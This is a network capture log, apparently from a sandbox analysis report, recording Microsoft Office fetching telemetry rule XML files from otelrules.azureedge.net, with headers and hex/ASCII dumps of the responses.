Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:47 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:48 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:48 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163148Z-16547b76f7fr28cchC1DFWnuws00000003y000000000nv31 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:48 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.5	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:48 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:48 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:48 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163148Z-16547b76f7fmbrhqhC1DFWkds800000003u000000000uexm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:48 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.5	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:48 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:48 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:48 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163148Z-16547b76f7fq9mcrhC1DFWq15w00000003t000000000r4q1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:48 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:48 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:48 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:48 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: fadf1528-a01e-001e-72d2-2c49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163148Z-16547b76f7fkj7j4hC1DFW0a9g00000003ug00000000m6u0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:48 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.5	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:48 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:48 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:48 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: 1deecc73-401e-0029-32d2-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163148Z-16547b76f7fcjqqhhC1DFWrrrc00000003x000000000986a x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:48 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	49843	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:49 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:49 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:49 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 512decfe-801e-0083-3058-2ef0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163149Z-r159446fcd77fkjdhC1DFWk94c00000004yg000000001xhq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:49 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.5	49844	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:49 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:49 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:49 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 038b2bb3-901e-007b-7258-2eac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163149Z-176bd8f9bc585r8thC1DFW1vw0000000055g00000000es6r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:49 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.5	49845	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:49 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:49 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:49 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163149Z-16547b76f7fx6rhxhC1DFW76kg00000003sg00000000t7ye x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:49 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.5	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:49 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:49 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:49 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 11e565ba-b01e-003d-3e55-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163149Z-176bd8f9bc55qmmkhC1DFW300000000005pg000000008375 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:49 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.5	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:49 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:49 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:49 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 62e9641c-201e-003c-0e61-2e30f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163149Z-15869dbbcc6b69h9hC1DFWf01w00000003zg0000000024nd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:49 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:49 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:50 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:49 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: 3018e20c-101e-008d-17d2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163149Z-16547b76f7ftdm8dhC1DFWs13g00000003sg00000000sb66 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:50 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:50 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:50 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:50 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: 71af9553-101e-00a2-14d2-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163150Z-16547b76f7fknvdnhC1DFWxnys00000003x000000000h162 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
